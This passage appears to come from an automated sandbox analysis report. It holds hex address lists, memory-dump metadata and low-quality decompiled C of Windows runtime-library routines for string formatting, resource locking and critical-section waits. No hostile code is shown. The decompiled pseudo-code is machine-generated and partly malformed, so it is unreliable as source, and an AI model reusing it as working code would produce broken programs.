                                                                                                                                                  0x0259238e
                                                                                                                                                  0x02592390
                                                                                                                                                  0x02555378
                                                                                                                                                  0x0255537c
                                                                                                                                                  0x02592396
                                                                                                                                                  0x02592396
                                                                                                                                                  0x02592397
                                                                                                                                                  0x0259239c
                                                                                                                                                  0x025923a2
                                                                                                                                                  0x025923a3
                                                                                                                                                  0x025923a6
                                                                                                                                                  0x025923ab
                                                                                                                                                  0x025923ad
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025923b3
                                                                                                                                                  0x025923b3
                                                                                                                                                  0x025923b4
                                                                                                                                                  0x025923b9
                                                                                                                                                  0x025923ba
                                                                                                                                                  0x025923ba
                                                                                                                                                  0x025923bc
                                                                                                                                                  0x025923bf
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589153
                                                                                                                                                  0x02589158
                                                                                                                                                  0x0258915a
                                                                                                                                                  0x0258915e
                                                                                                                                                  0x02589160
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589166
                                                                                                                                                  0x02589166
                                                                                                                                                  0x02589171
                                                                                                                                                  0x02589176
                                                                                                                                                  0x02589176
                                                                                                                                                  0x00000000
                                                                                                                                                  0x02589160
                                                                                                                                                  0x025923c6
                                                                                                                                                  0x025923ce
                                                                                                                                                  0x025923d7
                                                                                                                                                  0x025923d7
                                                                                                                                                  0x025923ad
                                                                                                                                                  0x02592390
                                                                                                                                                  0x02592373
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x02592291
                                                                                                                                                  0x02592291
                                                                                                                                                  0x02592293
                                                                                                                                                  0x02592295
                                                                                                                                                  0x0259229a
                                                                                                                                                  0x025922a1
                                                                                                                                                  0x025922a3
                                                                                                                                                  0x025922a7
                                                                                                                                                  0x025922a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922ab
                                                                                                                                                  0x025922ad
                                                                                                                                                  0x025922af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922af
                                                                                                                                                  0x025922b1
                                                                                                                                                  0x025922b4
                                                                                                                                                  0x025922b4
                                                                                                                                                  0x025922b6
                                                                                                                                                  0x025553be

                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 02592206
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Acquire Shared Sem Timeout %d(%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-4236105082
                                                                                                                                                  • Opcode ID: 9a8e8ee1687e241e6a64c059c147cac2036fc4d449694cdd4b1c8e86595aa948
                                                                                                                                                  • Instruction ID: aa9c0507e9fd5d0a55ee9b51777ee6e0ddfba3c64969157a4b38ce10171c32e0
                                                                                                                                                  • Opcode Fuzzy Hash: 9a8e8ee1687e241e6a64c059c147cac2036fc4d449694cdd4b1c8e86595aa948
                                                                                                                                                  • Instruction Fuzzy Hash: 97513B717402127BEF15CE18DC81F6677AABFC4720F218259FD45DB284EA71EC418B98
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 64%
                                                                                                                                                  			E025714C0(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16, intOrPtr* _a20) {
                                                                                                                                                  				signed int _v8;
                                                                                                                                                  				char _v10;
                                                                                                                                                  				char _v140;
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int _t24;
                                                                                                                                                  				void* _t26;
                                                                                                                                                  				signed int _t29;
                                                                                                                                                  				signed int _t34;
                                                                                                                                                  				signed int _t40;
                                                                                                                                                  				intOrPtr _t45;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				intOrPtr* _t52;
                                                                                                                                                  				void* _t54;
                                                                                                                                                  				signed int _t57;
                                                                                                                                                  				void* _t58;
                                                                                                                                                  
                                                                                                                                                  				_t51 = __edx;
                                                                                                                                                  				_t24 =  *0x2612088; // 0x7775eb7f
                                                                                                                                                  				_v8 = _t24 ^ _t57;
                                                                                                                                                  				_t45 = _a16;
                                                                                                                                                  				_t53 = _a4;
                                                                                                                                                  				_t52 = _a20;
                                                                                                                                                  				if(_a4 == 0 || _t52 == 0) {
                                                                                                                                                  					L10:
                                                                                                                                                  					_t26 = 0xc000000d;
                                                                                                                                                  				} else {
                                                                                                                                                  					if(_t45 == 0) {
                                                                                                                                                  						if( *_t52 == _t45) {
                                                                                                                                                  							goto L3;
                                                                                                                                                  						} else {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						}
                                                                                                                                                  					} else {
                                                                                                                                                  						L3:
                                                                                                                                                  						_t28 =  &_v140;
                                                                                                                                                  						if(_a12 != 0) {
                                                                                                                                                  							_push("[");
                                                                                                                                                  							_push(0x41);
                                                                                                                                                  							_push( &_v140);
                                                                                                                                                  							_t29 = E02567707();
                                                                                                                                                  							_t58 = _t58 + 0xc;
                                                                                                                                                  							_t28 = _t57 + _t29 * 2 - 0x88;
                                                                                                                                                  						}
                                                                                                                                                  						_t54 = E025713CB(_t53, _t28);
                                                                                                                                                  						if(_a8 != 0) {
                                                                                                                                                  							_t34 = E02567707(_t54,  &_v10 - _t54 >> 1, L"%%%u", _a8);
                                                                                                                                                  							_t58 = _t58 + 0x10;
                                                                                                                                                  							_t54 = _t54 + _t34 * 2;
                                                                                                                                                  						}
                                                                                                                                                  						if(_a12 != 0) {
                                                                                                                                                  							_t40 = E02567707(_t54,  &_v10 - _t54 >> 1, L"]:%u", _a12 & 0x0000ffff);
                                                                                                                                                  							_t58 = _t58 + 0x10;
                                                                                                                                                  							_t54 = _t54 + _t40 * 2;
                                                                                                                                                  						}
                                                                                                                                                  						_t53 = (_t54 -  &_v140 >> 1) + 1;
                                                                                                                                                  						 *_t52 = _t53;
                                                                                                                                                  						if( *_t52 < _t53) {
                                                                                                                                                  							goto L10;
                                                                                                                                                  						} else {
                                                                                                                                                  							E02532340(_t45,  &_v140, _t53 + _t53);
                                                                                                                                                  							_t26 = 0;
                                                                                                                                                  						}
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				return E0253E1B4(_t26, _t45, _v8 ^ _t57, _t51, _t52, _t53);
                                                                                                                                                  			}





















                                                                                                                                                  APIs
                                                                                                                                                  • ___swprintf_l.LIBCMT ref: 0259EA22
                                                                                                                                                    • Part of subcall function 025713CB: ___swprintf_l.LIBCMT ref: 0257146B
                                                                                                                                                    • Part of subcall function 025713CB: ___swprintf_l.LIBCMT ref: 02571490
                                                                                                                                                  • ___swprintf_l.LIBCMT ref: 0257156D
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ___swprintf_l
                                                                                                                                                  • String ID: %%%u$]:%u
                                                                                                                                                  • API String ID: 48624451-3050659472
                                                                                                                                                  • Opcode ID: 81e14d116224e9d1eafa3597882b6a5a789fffb5ff9ddff5dcb87e88e9465fde
                                                                                                                                                  • Instruction ID: 0d83a973a9c9c51ea95c3cbdc0ba1979bc5b632106b2270a48c197bd0ea17faf
                                                                                                                                                  • Opcode Fuzzy Hash: 81e14d116224e9d1eafa3597882b6a5a789fffb5ff9ddff5dcb87e88e9465fde
                                                                                                                                                  • Instruction Fuzzy Hash: 8F21C3B29006199FDF21DE64DC45AEE77ADFB54704F448512EC4AD3140DB70AE588FE8
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 45%
                                                                                                                                                  			E025553A5(signed int _a4, char _a8) {
                                                                                                                                                  				void* __ebx;
                                                                                                                                                  				void* __edi;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				signed int _t32;
                                                                                                                                                  				signed int _t37;
                                                                                                                                                  				signed int _t40;
                                                                                                                                                  				signed int _t42;
                                                                                                                                                  				void* _t45;
                                                                                                                                                  				intOrPtr _t46;
                                                                                                                                                  				void* _t48;
                                                                                                                                                  				signed int _t49;
                                                                                                                                                  				void* _t51;
                                                                                                                                                  				signed int _t57;
                                                                                                                                                  				signed int _t64;
                                                                                                                                                  				signed int _t71;
                                                                                                                                                  				void* _t74;
                                                                                                                                                  				intOrPtr _t78;
                                                                                                                                                  				signed int* _t79;
                                                                                                                                                  				void* _t85;
                                                                                                                                                  				signed int _t86;
                                                                                                                                                  				signed int _t92;
                                                                                                                                                  				void* _t104;
                                                                                                                                                  				void* _t105;
                                                                                                                                                  
                                                                                                                                                  				_t64 = _a4;
                                                                                                                                                  				_t32 =  *(_t64 + 0x28);
                                                                                                                                                  				_t71 = _t64 + 0x28;
                                                                                                                                                  				_push(_t92);
                                                                                                                                                  				if(_t32 < 0) {
                                                                                                                                                  					_t78 =  *[fs:0x18];
                                                                                                                                                  					__eflags =  *((intOrPtr*)(_t64 + 0x2c)) -  *((intOrPtr*)(_t78 + 0x24));
                                                                                                                                                  					if( *((intOrPtr*)(_t64 + 0x2c)) !=  *((intOrPtr*)(_t78 + 0x24))) {
                                                                                                                                                  						goto L3;
                                                                                                                                                  					} else {
                                                                                                                                                  						__eflags = _t32 | 0xffffffff;
                                                                                                                                                  						asm("lock xadd [ecx], eax");
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				} else {
                                                                                                                                                  					L3:
                                                                                                                                                  					_push(_t86);
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L4:
                                                                                                                                                  						__eflags = _t32;
                                                                                                                                                  						if(_t32 == 0) {
                                                                                                                                                  							break;
                                                                                                                                                  						}
                                                                                                                                                  						__eflags = _a8;
                                                                                                                                                  						if(_a8 == 0) {
                                                                                                                                                  							__eflags = 0;
                                                                                                                                                  							return 0;
                                                                                                                                                  						} else {
                                                                                                                                                  							 *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) =  *((intOrPtr*)( *((intOrPtr*)(_t64 + 0x34)) + 0x14)) + 1;
                                                                                                                                                  							_t79 = _t64 + 0x24;
                                                                                                                                                  							_t71 = 1;
                                                                                                                                                  							asm("lock xadd [eax], ecx");
                                                                                                                                                  							_t32 =  *(_t64 + 0x28);
                                                                                                                                                  							_a4 = _t32;
                                                                                                                                                  							__eflags = _t32;
                                                                                                                                                  							if(_t32 != 0) {
                                                                                                                                                  								L19:
                                                                                                                                                  								_t86 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  								while(1) {
                                                                                                                                                  									_t81 =  *(_t64 + 0x30) & 0x00000001;
                                                                                                                                                  									asm("sbb esi, esi");
                                                                                                                                                  									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x026101c0;
                                                                                                                                                  									_push(_t92);
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_t37 = E0252F8CC( *((intOrPtr*)(_t64 + 0x20)));
                                                                                                                                                  									__eflags = _t37 - 0x102;
                                                                                                                                                  									if(_t37 != 0x102) {
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t71 =  *(_t92 + 4);
                                                                                                                                                  									_t85 =  *_t92;
                                                                                                                                                  									_t51 = E02574FC0(_t85, _t71, 0xff676980, 0xffffffff);
                                                                                                                                                  									_push(_t85);
                                                                                                                                                  									_push(_t51);
                                                                                                                                                  									E02583F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
                                                                                                                                                  									E02583F92(0x65, 0, "RTL: Resource at %p\n", _t64);
                                                                                                                                                  									_t86 = _t86 + 1;
                                                                                                                                                  									_t105 = _t104 + 0x28;
                                                                                                                                                  									__eflags = _t86 - 2;
                                                                                                                                                  									if(__eflags > 0) {
                                                                                                                                                  										E025B217A(_t71, __eflags, _t64);
                                                                                                                                                  									}
                                                                                                                                                  									_push("RTL: Re-Waiting\n");
                                                                                                                                                  									_push(0);
                                                                                                                                                  									_push(0x65);
                                                                                                                                                  									E02583F92();
                                                                                                                                                  									_t104 = _t105 + 0xc;
                                                                                                                                                  								}
                                                                                                                                                  								__eflags = _t37;
                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                  									_push(_t37);
                                                                                                                                                  									E02573915(_t64, _t71, _t81, _t86, _t92, __eflags);
                                                                                                                                                  									asm("int3");
                                                                                                                                                  									_t40 =  *_t71;
                                                                                                                                                  									 *_t71 = 0;
                                                                                                                                                  									__eflags = _t40;
                                                                                                                                                  									if(_t40 == 0) {
                                                                                                                                                  										L1:
                                                                                                                                                  										_t42 = E02555384(_t92 + 0x24);
                                                                                                                                                  										if(_t42 != 0) {
                                                                                                                                                  											goto L31;
                                                                                                                                                  										} else {
                                                                                                                                                  											goto L2;
                                                                                                                                                  										}
                                                                                                                                                  									} else {
                                                                                                                                                  										_t83 =  *((intOrPtr*)(_t92 + 0x18));
                                                                                                                                                  										_push( &_a4);
                                                                                                                                                  										_push(_t40);
                                                                                                                                                  										_t49 = E0252F970( *((intOrPtr*)(_t92 + 0x18)));
                                                                                                                                                  										__eflags = _t49;
                                                                                                                                                  										if(__eflags >= 0) {
                                                                                                                                                  											goto L1;
                                                                                                                                                  										} else {
                                                                                                                                                  											_push(_t49);
                                                                                                                                                  											E02573915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
                                                                                                                                                  											L31:
                                                                                                                                                  											_t82 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                  											_push( &_a4);
                                                                                                                                                  											_push(1);
                                                                                                                                                  											_t42 = E0252F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                  											__eflags = _t42;
                                                                                                                                                  											if(__eflags >= 0) {
                                                                                                                                                  												L2:
                                                                                                                                                  												return _t42;
                                                                                                                                                  											} else {
                                                                                                                                                  												_push(_t42);
                                                                                                                                                  												E02573915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
                                                                                                                                                  												_t73 =  *((intOrPtr*)(_t92 + 0x20));
                                                                                                                                                  												_push( &_a4);
                                                                                                                                                  												_push(1);
                                                                                                                                                  												_t42 = E0252F970( *((intOrPtr*)(_t92 + 0x20)));
                                                                                                                                                  												__eflags = _t42;
                                                                                                                                                  												if(__eflags >= 0) {
                                                                                                                                                  													goto L2;
                                                                                                                                                  												} else {
                                                                                                                                                  													_push(_t42);
                                                                                                                                                  													_t45 = E02573915(_t64, _t73, _t82, _t86, _t92, __eflags);
                                                                                                                                                  													asm("int3");
                                                                                                                                                  													while(1) {
                                                                                                                                                  														_t74 = _t45;
                                                                                                                                                  														__eflags = _t45 - 1;
                                                                                                                                                  														if(_t45 != 1) {
                                                                                                                                                  															break;
                                                                                                                                                  														}
                                                                                                                                                  														_t86 = _t86 | 0xffffffff;
                                                                                                                                                  														_t45 = _t74;
                                                                                                                                                  														asm("lock cmpxchg [ebx], edi");
                                                                                                                                                  														__eflags = _t45 - _t74;
                                                                                                                                                  														if(_t45 != _t74) {
                                                                                                                                                  															continue;
                                                                                                                                                  														} else {
                                                                                                                                                  															_t46 =  *[fs:0x18];
                                                                                                                                                  															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
                                                                                                                                                  															return _t46;
                                                                                                                                                  														}
                                                                                                                                                  														goto L38;
                                                                                                                                                  													}
                                                                                                                                                  													E02555329(_t74, _t92);
                                                                                                                                                  													_push(1);
                                                                                                                                                  													_t48 = E025553A5(_t92);
                                                                                                                                                  													return _t48;
                                                                                                                                                  												}
                                                                                                                                                  											}
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  								} else {
                                                                                                                                                  									_t32 =  *(_t64 + 0x28);
                                                                                                                                                  									continue;
                                                                                                                                                  								}
                                                                                                                                                  							} else {
                                                                                                                                                  								_t71 =  *_t79;
                                                                                                                                                  								__eflags = _t71;
                                                                                                                                                  								if(__eflags > 0) {
                                                                                                                                                  									while(1) {
                                                                                                                                                  										_t57 = _t71;
                                                                                                                                                  										asm("lock cmpxchg [edi], esi");
                                                                                                                                                  										__eflags = _t57 - _t71;
                                                                                                                                                  										if(_t57 == _t71) {
                                                                                                                                                  											break;
                                                                                                                                                  										}
                                                                                                                                                  										_t71 = _t57;
                                                                                                                                                  										__eflags = _t57;
                                                                                                                                                  										if(_t57 > 0) {
                                                                                                                                                  											continue;
                                                                                                                                                  										}
                                                                                                                                                  										break;
                                                                                                                                                  									}
                                                                                                                                                  									_t32 = _a4;
                                                                                                                                                  									__eflags = _t71;
                                                                                                                                                  								}
                                                                                                                                                  								if(__eflags != 0) {
                                                                                                                                                  									continue;
                                                                                                                                                  								} else {
                                                                                                                                                  									goto L19;
                                                                                                                                                  								}
                                                                                                                                                  							}
                                                                                                                                                  						}
                                                                                                                                                  						goto L38;
                                                                                                                                                  					}
                                                                                                                                                  					_t71 = _t71 | 0xffffffff;
                                                                                                                                                  					_t32 = 0;
                                                                                                                                                  					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                  					__eflags = 0;
                                                                                                                                                  					if(0 != 0) {
                                                                                                                                                  						goto L4;
                                                                                                                                                  					} else {
                                                                                                                                                  						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
                                                                                                                                                  						return 1;
                                                                                                                                                  					}
                                                                                                                                                  				}
                                                                                                                                                  				L38:
                                                                                                                                                  			}


























                                                                                                                                                  0x025923d7
                                                                                                                                                  0x025923ad
                                                                                                                                                  0x02592390
                                                                                                                                                  0x02592373
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259233f
                                                                                                                                                  0x02592291
                                                                                                                                                  0x02592291
                                                                                                                                                  0x02592293
                                                                                                                                                  0x02592295
                                                                                                                                                  0x0259229a
                                                                                                                                                  0x025922a1
                                                                                                                                                  0x025922a3
                                                                                                                                                  0x025922a7
                                                                                                                                                  0x025922a9
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922ab
                                                                                                                                                  0x025922ad
                                                                                                                                                  0x025922af
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922af
                                                                                                                                                  0x025922b1
                                                                                                                                                  0x025922b4
                                                                                                                                                  0x025922b4
                                                                                                                                                  0x025922b6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025922b6
                                                                                                                                                  0x0259228f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0259226d
                                                                                                                                                  0x025553cb
                                                                                                                                                  0x025553ce
                                                                                                                                                  0x025553d0
                                                                                                                                                  0x025553d4
                                                                                                                                                  0x025553d6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x025553d8
                                                                                                                                                  0x025553e3
                                                                                                                                                  0x025553ea
                                                                                                                                                  0x025553ea
                                                                                                                                                  0x025553d6
                                                                                                                                                  0x00000000

                                                                                                                                                  APIs
                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 025922F4
                                                                                                                                                  Strings
                                                                                                                                                  • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 025922FC
                                                                                                                                                  • RTL: Resource at %p, xrefs: 0259230B
                                                                                                                                                  • RTL: Re-Waiting, xrefs: 02592328
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000006.00000002.2220190974.0000000002520000.00000040.00000001.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                                  • Associated: 00000006.00000002.2220178466.0000000002510000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220294994.0000000002600000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220301799.0000000002610000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220310809.0000000002614000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220316099.0000000002617000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220322466.0000000002620000.00000040.00000001.sdmp
                                                                                                                                                  • Associated: 00000006.00000002.2220373772.0000000002680000.00000040.00000001.sdmp
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                  • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                                                                                                                  • API String ID: 885266447-871070163
                                                                                                                                                  • Opcode ID: 37bdf1a21dae3e2d510ca7391243988e032e68bc0566345c1da14a2cf027b7dd
                                                                                                                                                  • Instruction ID: 159baed7f8a511b62a231b443809cd4b8ea1b8320e2537a3fd696617f60634c0
                                                                                                                                                  • Opcode Fuzzy Hash: 37bdf1a21dae3e2d510ca7391243988e032e68bc0566345c1da14a2cf027b7dd
                                                                                                                                                  • Instruction Fuzzy Hash: 695108716106167BEF119F28DC80FA677A9BF85724F11421AFD09DB280F771E8458BA8
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 51%
                                                                                                                                                  			E0255EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                  				intOrPtr _v8;
                                                                                                                                                  				intOrPtr _v12;
                                                                                                                                                  				signed int _v24;
                                                                                                                                                  				intOrPtr* _v28;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				signed int _v36;
                                                                                                                                                  				intOrPtr _v40;
                                                                                                                                                  				short _v66;
                                                                                                                                                  				char _v72;
                                                                                                                                                  				void* __esi;
                                                                                                                                                  				intOrPtr _t38;
                                                                                                                                                  				intOrPtr _t39;
                                                                                                                                                  				signed int _t40;
                                                                                                                                                  				intOrPtr _t42;
                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                  				signed int _t44;
                                                                                                                                                  				void* _t46;
                                                                                                                                                  				intOrPtr _t48;
                                                                                                                                                  				signed int _t49;
                                                                                                                                                  				intOrPtr _t50;
                                                                                                                                                  				intOrPtr _t53;
                                                                                                                                                  				signed char _t67;
                                                                                                                                                  				void* _t72;
                                                                                                                                                  				intOrPtr _t77;
                                                                                                                                                  				intOrPtr* _t80;
                                                                                                                                                  				intOrPtr _t84;
                                                                                                                                                  				intOrPtr* _t85;
                                                                                                                                                  				void* _t91;
                                                                                                                                                  				void* _t92;
                                                                                                                                                  				void* _t93;
                                                                                                                                                  
                                                                                                                                                  				_t80 = __edi;
                                                                                                                                                  				_t75 = __edx;
                                                                                                                                                  				_t70 = __ecx;
                                                                                                                                                  				_t84 = _a4;
                                                                                                                                                  				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
                                                                                                                                                  					E0254DA92(__ecx, __edx, __eflags, _t84);
                                                                                                                                                  					_t38 =  *((intOrPtr*)(_t84 + 0x10));
                                                                                                                                                  				}
                                                                                                                                                  				_push(0);
                                                                                                                                                  				__eflags = _t38 - 0xffffffff;
                                                                                                                                                  				if(_t38 == 0xffffffff) {
                                                                                                                                                  					_t39 =  *0x261793c; // 0x0
                                                                                                                                                  					_push(0);
                                                                                                                                                  					_push(_t84);
                                                                                                                                                  					_t40 = E025316C0(_t39);
                                                                                                                                                  				} else {
                                                                                                                                                  					_t40 = E0252F9D4(_t38);
                                                                                                                                                  				}
                                                                                                                                                  				_pop(_t85);
                                                                                                                                                  				__eflags = _t40;
                                                                                                                                                  				if(__eflags < 0) {
                                                                                                                                                  					_push(_t40);
                                                                                                                                                  					E02573915(_t67, _t70, _t75, _t80, _t85, __eflags);
                                                                                                                                                  					asm("int3");
                                                                                                                                                  					while(1) {
                                                                                                                                                  						L21:
                                                                                                                                                  						_t76 =  *[fs:0x18];
                                                                                                                                                  						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                  						__eflags =  *(_t42 + 0x240) & 0x00000002;
                                                                                                                                                  						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
                                                                                                                                                  							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
                                                                                                                                                  							_v66 = 0x1722;
                                                                                                                                                  							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                  							_t76 =  &_v72;
                                                                                                                                                  							_push( &_v72);
                                                                                                                                                  							_v28 = _t85;
                                                                                                                                                  							_v40 =  *((intOrPtr*)(_t85 + 4));
                                                                                                                                                  							_v32 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                  							_push(0x10);
                                                                                                                                                  							_push(0x20402);
                                                                                                                                                  							E025301A4( *0x7ffe0382 & 0x000000ff);
                                                                                                                                                  						}
                                                                                                                                                  						while(1) {
                                                                                                                                                  							_t43 = _v8;
                                                                                                                                                  							_push(_t80);
                                                                                                                                                  							_push(0);
                                                                                                                                                  							__eflags = _t43 - 0xffffffff;
                                                                                                                                                  							if(_t43 == 0xffffffff) {
                                                                                                                                                  								_t71 =  *0x261793c; // 0x0
                                                                                                                                                  								_push(_t85);
                                                                                                                                                  								_t44 = E02531F28(_t71);
                                                                                                                                                  							} else {
                                                                                                                                                  								_t44 = E0252F8CC(_t43);
                                                                                                                                                  							}
                                                                                                                                                  							__eflags = _t44 - 0x102;
                                                                                                                                                  							if(_t44 != 0x102) {
                                                                                                                                                  								__eflags = _t44;
                                                                                                                                                  								if(__eflags < 0) {
                                                                                                                                                  									_push(_t44);
                                                                                                                                                  									E02573915(_t67, _t71, _t76, _t80, _t85, __eflags);
                                                                                                                                                  									asm("int3");
                                                                                                                                                  									E025B2306(_t85);
                                                                                                                                                  									__eflags = _t67 & 0x00000002;
                                                                                                                                                  									if((_t67 & 0x00000002) != 0) {
                                                                                                                                                  										_t7 = _t67 + 2; // 0x4
                                                                                                                                                  										_t72 = _t7;
                                                                                                                                                  										asm("lock cmpxchg [edi], ecx");
                                                                                                                                                  										__eflags = _t67 - _t67;
                                                                                                                                                  										if(_t67 == _t67) {
                                                                                                                                                  											E0255EC56(_t72, _t76, _t80, _t85);
                                                                                                                                                  										}
                                                                                                                                                  									}
                                                                                                                                                  									return 0;
                                                                                                                                                  								} else {
                                                                                                                                                  									__eflags = _v24;
                                                                                                                                                  									if(_v24 != 0) {
                                                                                                                                                  										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
                                                                                                                                                  									}
                                                                                                                                                  									return 2;
                                                                                                                                                  								}
                                                                                                                                                  								goto L36;
                                                                                                                                                  							}
                                                                                                                                                  							_t77 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                  							_push(_t67);
                                                                                                                                                  							_t46 = E02574FC0( *_t80, _t77, 0xff676980, 0xffffffff);
                                                                                                                                                  							_push(_t77);
                                                                                                                                                  							E02583F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
                                                                                                                                                  							_t48 =  *_t85;
                                                                                                                                                  							_t92 = _t91 + 0x18;
                                                                                                                                                  							__eflags = _t48 - 0xffffffff;
                                                                                                                                                  							if(_t48 == 0xffffffff) {
                                                                                                                                                  								_t49 = 0;
                                                                                                                                                  								__eflags = 0;
                                                                                                                                                  							} else {
                                                                                                                                                  								_t49 =  *((intOrPtr*)(_t48 + 0x14));
                                                                                                                                                  							}
                                                                                                                                                  							_t71 =  *((intOrPtr*)(_t85 + 0xc));
                                                                                                                                                  							_push(_t49);
                                                                                                                                                  							_t50 = _v12;
                                                                                                                                                  							_t76 =  *((intOrPtr*)(_t50 + 0x24));
                                                                                                                                                  							_push(_t85);
                                                                                                                                                  							_push( *((intOrPtr*)(_t85 + 0xc)));
                                                                                                                                                  							_push( *((intOrPtr*)(_t50 + 0x24)));
